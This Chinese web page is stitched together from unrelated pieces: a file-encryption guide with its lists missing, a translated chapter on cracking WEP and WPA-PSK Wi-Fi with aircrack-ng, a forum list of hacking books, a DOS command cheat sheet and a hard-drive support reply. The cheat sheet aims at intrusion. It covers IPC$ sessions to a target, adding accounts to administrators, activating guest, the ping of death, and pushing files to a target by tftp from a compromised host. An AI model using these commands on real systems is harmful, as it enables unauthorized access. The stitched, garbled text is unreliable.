在数字时代,保护我们的文件和数据比以往任何时候都更加重要。文件加密是确保机密信息安全的一种简单有效的方法,本文将为您提供一个从头到尾的综合指南,让您从加密初学者到加密专家。
ADIng="lazy">加密是一个过程,它将明文(可读文本)转换为密文(不可读文本)。在需要解密信息时,可以使用加密密钥将其转换回明文。
有许多加密算法可供选择,每种算法都有其独特的优点和缺点。最常见的算法包括:
加密密钥是一段随机数据,它用于加密和解密文件。密钥的长度和复杂性决定了加密的强度。密钥越长,破解它的难度就越大。
Windows 10 和 Windows 11 都包含名为 BitLocker 的内置加密功能。要启用 BitLocker:
您还可以使用“文件夹选项”加密单个文件或文件夹:
除了 Windows 内置的加密功能外,还有许多第三方加密软件可供选择。这些软件通常提供了更多高级选项和功能,例如:
一些流行的第三方加密软件包括:
要解密已加密的文件,您需要知道加密密钥。
Windows 加密文件: 输入加密密钥以解锁和解密文件。第三方加密软件: 使用加密软件中提供的工具解密文件。文件加密虽然是保护数据的好方法,但它也存在一些局限性:
文件加密是保护数字数据的一种简单有效的方法。通过遵循本指南,您可以学习如何轻松加密文件,无论您是经验丰富的用户还是加密初学者。
请记住安全处理加密密钥,并定期练习良好的数据安全习惯,以确保您的文件和数据保持安全。
即使做了最充分的预测,未来始终是不可预测的。 WLAN 委员会设计了了 WEP 和 WPA 作为最简单的加密机制,但是,久而久之,这些机制拥有在现实世界中广泛公布和利用的缺陷。 WLAN 加密机制易受密码学攻击,这有相当长的历史了。 这从 2000 年的 WEP 开始,它最后被完全破解。 最近,攻击慢慢转向了 WPA。 即使当前没有公开攻击方式用于在所有情况下破解 WPA,特殊情况下的攻击还是可行的。 WLAN 在空气中传输数据,所以保护数据的机密性是一种内在需求。 使用加密是最佳方案。 WLAN 委员会(IEEE 802.11)为数据加密指定了以下协议: 这一章中,我们会看一看每个加密协议,并展示针对它们的多种攻击。 WEP 协议在 2000 年发现漏洞,但是,诧异的是,它仍然被使用,并且接入点仍然自带 WEP 功能。 WEP 中有许多密码学缺陷,它们被Walker,Arbaugh,Fluhrer,Martin,Shamir,KoreK,以及其它人发现。 密码学立场上的评估超出了这本书的范围,并且涉及到复杂的数学。 这一节中,我们会看一看如何使用 Kali 中便捷可用的工具来破解 WEP 加密。 这包含整个 aircrack-ng 工具套件 --airmon-ng , aireplay-ng , airodump-ng , aircrack-ng ,以及其它。 WEP 的基础缺陷是使用 RC4 和短的 IV 值,每 224 帧复用。 虽然这本身是个大数,但是每 5000 个封包中还是有 50% 的几率重用四次。 为了利用这个,我们尝试大量流量,是我们增加重用 IV 的可能性,从而比较两个使用相同密钥和 IV 加密的密文。 让我们首先在测试环境中建立 WEP,并且看看如何破解。 遵循以下指南来开始: 我们在环境中建立 WEP,并成功破解了 WEP 密钥。 为了完成它,我们首先等待正常客户端连接到接入点。 之后,我们使用 aireplay-ng 工具在网络上重放 ARP 封包。 这会导致网络发送 ARP 重放封包,从而增加空中发送的数据封包数量。 之后我们使用 aircrack-ng工具,通过分析数据风暴的密码学缺陷来破解 WEP 密钥。 要注意我们也能够使用共享密钥验证绕过机制,来伪造接入点的验证,这会在后面的章节中学到。 如果正常客户端离开了网络,这可以更方便一些。 这会确保我们可以伪造验证和关联,并且继续将重放封包发送到网络。 在之前的练习中,如果正常客户端突然断开了网络,我们就不能重放封包,因为接入点会拒绝接受来自未关联客户端的封包。 你的挑战就是,使用即将在后面学到的共享密钥绕过伪造验证和授权,使你仍然能够将封包注入到网络中,并验证接入点是否接受和响应它们。 WPA 或者 WPA v1 主要使用 TKIP 加密算法。 TKIP 用于改进 WEP,不需要完全新的硬件来运行。 反之,WPA2 必须使用 AES-CCMP 算法来加密,这比 TKIP 更加强大和健壮。 WPA 和 WPA2 允许 基于 WAP 的验证,使用基于 RADIUS 服务器(企业)和预共享密钥(PSK)(个人)的验证模式。 WPA/WPA2 PSK 易受字典攻击。 攻击所需的输入是客户端和接入点之间的四次 WPA 握手,以及包含常用口令的单词列表。 之后,使用例如Aircrack-ng 的工具,我们可以尝试破解 WPA/WPA2 PSK 口令。 四次握手的展示见下面: WPA/WPA2 PSK 的原理是它导出了会话层面的密钥,叫做成对临时密钥(PTK),使用预共享密钥和五个其它参数 -- 网络 SSID、验证者 Nounce (ANounce)、申请者 Nounce (SNounce)、验证着 MAC 地址(接入点 MAC)、申请者 MAC 地址(wifi 客户端 MAC)。 密钥之后用于加密接入点和客户端之间的所有数据。 通过嗅探空气来窃取整个对话的攻击者,可以获得前面提到的全部五个参数。 它唯一不能得到的东西就是预共享密钥。 所以,预共享密钥如何创建?它由用户提供的 WPA-PSK 口令以及 SSID 导出。 这些东西的组合通过基于密码的密钥推导函数(PBKDF2)来发送,它的输出是 256 位的共享密钥。 在典型的 WPA/WPA2 PSK 字典攻击中,攻击者会使用可能口令的大量字典以及攻击工具。 工具会从每个口令中导出 256 位的预共享密钥,并和其它参数(之前提到过)一起使用来创建 PTK。 PTK 用于在握手包之一中验证信息完整性检查(MIC)。 如果匹配,从字典中猜测的口令就正确,反之就不正确。 最后,如果授权网络的口令存在于字典中,它会被识别。 这就是 WPA/WPA2 PSK 破解的工作原理。 下面的图展示涉及到的步骤: 下个练习中,我们会看一看如何破解 WPA PSK 无线网络。 使用 CCMP(AES)的WPA2-PSK 网络的破解步骤与之相同。 遵循以下指南来开始: 我们在接入点上设置了 WPA-PSK,使用常见口令: abcdefgh 。 之后我们使用解除验证攻击,让正常客户端重新连接到接入点。 当我们重新连接时,我们捕获了客户端和接入点之间的 WPA 四次握手。 因为 WPA-PSK 易受字典攻击,我们向 Aircrack-ng 输入了包含 WPA 四次握手的捕获文件,以及常见口令的列表(以单词列表形式)。 因为口令 abcdefgh 出现在单词列表中, Aircrack-ng 就能够破解 WPS-PSK 共享口令。 要再次注意,在基于字典的 WPA 破解中,你的水平就等于你的字典。 所以在你开始之前,编译一个大型并且详细的字典非常重要。 通过 Kali 自带的字典,有时候可能不够,可能需要更多单词,尤其是考虑位置因素。 Cowpatty 是个同样使用字典攻击来破解 WPA-PSK 口令的工具。 这个工具在 Kali 中自带。 我将其留做练习,来让你使用 Cowpatty 破解 WPA-PSK 口令。 同样,设置不常见的口令,它不出现在你的字典中,并再次尝试。 你现在再破解口令就不会成功了,无论使用 Aircrack-ng还是 Cowpatty。 要注意,可以对 WPA2-PSK 网络执行相同攻击。 我推荐你自己验证一下。 我们在上一节中看到,如果我们在字典中拥有正确的口令,破解个人 WPA 每次都会像魔法一样。 所以,为什么我们不创建一个大型的详细字典,包含百万个常见密码和词组呢?这会帮助我们很多,并且多数情况都会最终破解出口令。 这听起来不错,但是我们错过了一个核心组件 -- 所花费的时间。 更多需要 CPU 和时间的计算之一就是使用 PSK 口令和 SSID 通过 PSKDF2 的预共享密钥。 这个函数在输出 256 位的与共享密钥之前,计算超过 4096 次二者组合的哈希。 破解的下一步就是使用这个密钥以及四次握手中的参数来验证握手中的 MIC。 这一步计算了非常大。 同样,握手中的参数每次都会变化,于是这一步不能预先计算。 所以,为了加速破解进程,我们需要使来自口令的与共享密钥的计算尽可能快。 我们可以通过预先计算与共享密钥,在 802.11 标准术语中也叫作成对主密钥(PMK)来加速。 要注意,因为 SSID 也用于计算 PMK,使用相同口令和不同 SSID,我们会得到不同的 PMK。 所以,PMK 取决于口令和 SSID。 下个练习中,我们会看看如何预先计算 PMK,并将其用于 WPA/WPA2 的破解。 我们可以遵循以下步骤来开始: 我们查看了多种不同工具和技巧来加速 WPA/WPA2-PSK 破解。 主要原理就是对给定的 SSID 和字典中的口令列表预计算 PMK。 在所有我们做过的联系中,我们使用多种技巧破解了 WEP 和 WPA 密钥。 我们能拿这些信息做什么呢?第一步就是使用密钥解密我们捕获的数据封包。 下一个练习中,我们会在相同的我们所捕获的记录文件中解密 WEP 和 WPA 封包,使用我们破解得到的密钥。 遵循以下步骤来开始: 我们刚刚看到了如何使用 Airdecap-ng 解密 WEP 和 WPA/WPA2-PSK 加密封包。 要注意,我们可以使用 Wireshark 做相同的事情。 我们推荐你查阅 Wireshark 的文档来探索如何用它来完成。 我们也可以在破解网络密钥之后连接到授权网络。 这在渗透测试过程中非常方便。 使用破解的密钥登录授权网络,是你可以提供给客户的证明网络不安全的证据。 遵循以下步骤来开始: 我们连接到了 WEP 网络。 遵循以下步骤来开始: 默认的 WIFI 工具 iwconfig 不能用于连接 WPA/WPA2 网络。 实际上的工具是 WPA_Supplicant 。 这个实验中,我们看到如何使用它来连接 WPA 网络。 Q1 哪种封包用于封包重放? Q2 WEP 什么时候能被破解? Q3 WPA 什么时候能被破解? 这一章中,我们了解了 WLAN 加密。 WEP 含有缺陷,无论 WEP 密钥是什么,使用足够的数据封包就能破解 WEP。 WPA/WPA2 在密码学上不可破解;但是,在特殊的场景下,例如 WPA/WP2-PSK 中使用了弱口令,它就能够通过字典攻击来获得口令。 下一章中我们会看一看 WLAN 设施上的不同工具,例如伪造接入点,邪恶双生子,位反转攻击,以及其它。
1.《黑客入门》这是我看的第一本黑客书籍,是比较初级的一些黑客知识,但是后面的实例运用到了html代码,主要是讲网页方面入侵知识,当时我自己也看不懂那些,因此就去把html学一下(其实也就是看看代码而已,自己根本写不出啥代码来,呵呵……)2.《30天打造专业红客》任何一本写着什么几天精通,几天速成的书,其实都是不可信的,但这不是我们现在要讲的问题,这本书可以弥补上本书中的本足之处,里面有一些内容可能讲得会比较详细些,适合初学者。 3.《防黑档案》这本书是东方飘云写的,好像就是绿色兵团的副司令吧,呵呵,我先顶一下…………4.《黑客攻防实战入门》这是一本以实战为主线的黑客书籍,大力推荐!!!必竟电脑技术本来就是要在实践中才能提高的,光靠理论是行不通,你可以边看此书边操作,相信对于你的实战能力会有所帮助的。 上面这些都是一些黑客入门方面的书籍,其中有部分是相同,大家可择其善者而从之!!!5.《C语言程序设计》不学编程的人是永远不可能成为黑客的,因此学编程也成为我们在学黑道路上的必经之路,也是最需要精力与耐力的过程。 这本就是谭浩强写的那本,大家也可以看看老外写的那本《the c programe language》,如果你能将书中的代码都自己调试操作一遍,对于C语言基础知识的掌握应该不成问题。 6.《VC++深入详解》这是一本他人根据孙鑫的视频教程编写的一本书,因此这本书也就有其配套视频了,地址如下:《IBM-PC汇编语言程序设计》这是清华大学出版的,虽然有点过时了,是本16位机器时代的,与现在的win32,win64有点差别,但其本质也是大同小异的,相信对于想学习逆向分析的战友们,汇编也是一项必修课啊,关于此书,各位可以看看中山大学的汇编语言视频教程,其教学方式也是比较新颖的,大家一看便知,地址如下:如果想要看在线视频,可通过下面地址查看:,将后面的hb01改为02,03……即可,不过很慢,缓冲都要N久,我是等得不耐烦了,呵呵8.《windows环境下的32位汇编语言程序设计》就是罗云彬写的那本,如果你学完了上本汇编书籍或视频,那么就可以开始学习win32汇编了,要知道这本书我是用手机看的,呵呵,不容易啊,因为缺乏实践,因此自己学得也不咋滴,自己是打算先简单看一遍,简单了解个大概,再看第二遍,这遍以实践操作为主,最后再系统地复习一遍,这项任务,本人尚未完成啊,以上意见也只是给大家做个参考而已,希望对大家有所帮助。 9.《ASP从入门到精通》想学脚本入侵的战友,脚本语言是一定要学的,有机会也最好自己做个博客之类的站点。 这本书后面有很多的实例项目,如后台管理,收费系统等等。 另外还有一本我自己看过的关于asp的书——《ASP可视化编程与应用》,此书是在dreamweaver下面的实践操作,也算是在学asp的同时,也学习一下dreamweaver的使用,一举两得。 这两本书中对html以及vbscript均有所讲解,因为asp中可嵌入vbscript,javascript.10.《php高手宝典》此书我是没看过,只是看了下目录与开头而已,打算后面有时间再补看一下,因此对此书我也没有什么发言权了,有看过的战友可以发表一下意见。 11.《黑客反汇编揭秘》这是一本关于逆向分析的书,与其配套的还有一本叫《黑客调试技术揭秘》,反汇编这本书网上有电子书,大家可下载来看,pdf格式的,但是调试这本书我没找到,在网上写着调试的书名,下载下来才发现是反汇编那本书.这两本书对汇编知识均有一定的要求,因此建议大家先学完汇编再看。 12.《网络黑客加密与解密》这本书里面有一些脚本入侵方面的一点知识,内容较少,主要是讲加解密方面的知识,后面有大部分的破解实例讲解,但注释较少,我自己当时也是看得迷糊迷糊的(没办法,自己汇编能力差点,呵呵)13.《加密解密全方位学习》这本书我是在图书馆看到的,适合加解密初学者,因为这本书要求的预备知识不高,只要有点C语言基础就可以,里面会讲到一些相对简单些的汇编指令,以及crackme的简单制作,还有注册机的编写(个人觉得不是很详细)14.《加密与解密》就是看雪学院那本书,第三版快出来了,就在这一二月份吧!我 看的是第二版的电子书,还没看完,这本书在加解密方面写得算是比较完整详细的了,而且是从基础讲起,循序渐进,大力推荐,若要学习逆向工程,看雪学院也确实是个不错的地方。 15.《shellcode编程揭秘》这是一本关于缓冲区溢出攻击的书,我自己也没看过,不过电子书倒是有,就放在邮箱里面,呵呵,打算后面再看,关于溢出攻击的书还有很多,如《网络渗透技术》,《缓冲区溢出攻击检测,预防,剖析》,《the shellcode handbook》16.《深入理解计算机系统》此书也是我在图书馆借的,被我霸占了半年之久,这次又被我借回来复习一下了(真对不起各位书友啊,呼呼……),这是一本站在程序员的角度写的一本书,因此也必须要有C语言基础,要是有unix系统的操作经验会更好,因为这本书中的代码就是在UNIX下调试操作的。 相信这本书对于你学出更好的代码会有一定的帮助,其中还有特别的一章用来讲解如何编写高效的程序,并以一个实例代码来讲解,一步步地进行完善,最终写出一个高效率的程序。 这本书也是学溢出攻击方面的基础知识,在安全焦点上也说这本书是《网络渗透技术》的基础知识,但看完这本书也不一定能看懂网渗,呵呵……17.《rootkit:windows内核安全防护》内容简介本书是目前第一本关于rootkit的详尽指南,包括rootkit的概念、它们是怎样工作的、如何构建和检测它们。 世界顶级软件安全专家、创始人Greg Hoglund和James Butler向大家详细介绍攻击者是如何进入系统并长期驻留而不会被检测到的,以及黑客是如何摧毁Windows XP和Windows 2000内核系统的,其概念可以应用于现代任何主流操作系统。 通过本书,读者可以全面掌握rootkit,提升自己的计算机安全防范能力.18.《0day安全:软件漏洞分析技术》四月份刚出版的,看雪论坛的,有看过一部分学得还不错,适合对溢出感兴趣的战友们。 要告诉你点常识…虽然多,但都是基本的!希望你可以用心去学!DOS 命令net use ipipc$ /user: 建立IPC空链接 net use ipipc$ 密码 /user:用户名 建立IPC非空链接 net use h: ipc$ 密码 /user:用户名 直接登陆后映射对方C:到本地为H: net use h: ipc$ 登陆后映射对方C:到本地为H: net use ipipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名 密码 /add 建立用户 net user guest /active:yes 激活guest用户 net user 查看有哪些用户 net user 帐户名 查看帐户的属性 net localgroup administrators 用户名 /add 把用户添加到管理员中使其具有管理员权限,注意: administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名 开启服务;(如:net start telnet, net start schedule) net stop 服务名 停止某服务 net time 目标ip 查看对方时间 net time 目标ip /set 设置本地计算机时间与目标IP主机的时间同步,加上参数/yes可取消确认信息 net view 查看本地局域网内开启了哪些共享 net view ip 查看对方局域网内开启了哪些共享 net config 显示系统网络设置 net logoff 断开连接的共享 net pause 服务名 暂停某服务 net send ip 文本信息 向对方发信息 net ver 局域网内正在使用的网络连接类型和信息 net share 查看本地开启的共享 net share ipc$ 开启ipc$共享 net share ipc$ /del 删除ipc$共享 net share c$ /del 删除C:共享 net user guest 用guest用户登陆后用将密码改为 net password 密码 更改系统登陆密码 netstat -a 查看开启了哪些端口,常用netstat -an netstat -n 查看端口的网络连接情况,常用netstat -an netstat -v 查看正在进行的工作 netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况) netstat -s 查看正在使用的所有协议使用情况 nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写 tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:-w数字用于设置超时间隔。 ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:-l[空格]数据包大小;-n发送数据次数;-t指一直 ping。 ping -t -l ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参 数/all显示全部配置信息 tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A- H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。 例如DEL/AR *.*表示删除当前目录下所有只读文件,DEL/A- S *.*表示删除当前目录下除系统文件以外的所有文件 二: del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。 同时使用参数/Q 可取消删除操作时的系统确认就直接删除。 (二个命令作用相同) move 盘符路径要移动的文件名 存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 fc > 对比二个文件并把不同之处输出到文件中,> 和> > 是重定向命 令 at id号 开启已注册的某个计划任务 at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止 at id号 /delete 停止某个已注册的计划任务 at 查看所有的计划任务 at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 finger username @host 查看最近有哪些用户登陆 telnet ip 端口 远和登陆服务器,默认端口为23 open ip 连接到IP(属telnet登陆后的命令) telnet 在本机上直接键入telnet 将进入本机的telnet copy 路径文件名1 路径文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件 copy ipadmin$ 复制本到对方的admin下 cppy /b+/a 将的内容藏身到中生成新的文件,注: 文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件 copy ipadmin$ c: 或:copyipadmin$*.* 复制对方admini$共享下的文件(所有文 件)至本地C: xcopy 要复制的文件或目录树 目标地址目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件 tftp -i 自己IP(用肉机作跳板时这用肉机IP) get 登陆后,将IP的 下载到目标主机 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式 (传送文本文件模式)进行传送 tftp -i 对方IP put 登陆后,上传本至主机 ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。 bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文 本文件时) route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。 arp -a将显示出全部信息 start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令 望采纳O(∩_∩)O
你好,请问你指的加密软件是WD security吗?据我所知,WD Elements Portable是不支持WD Security的哦。 关于WD Security解锁的步骤,你可阅读该移动硬盘的[完整安装指南]。 此外,你可游览西数官网以查询支持WD Security的移动硬盘系列:1。 到WD中文官方网站2。 外部硬盘3。 便捷式4。 全部比较希望对你有帮助。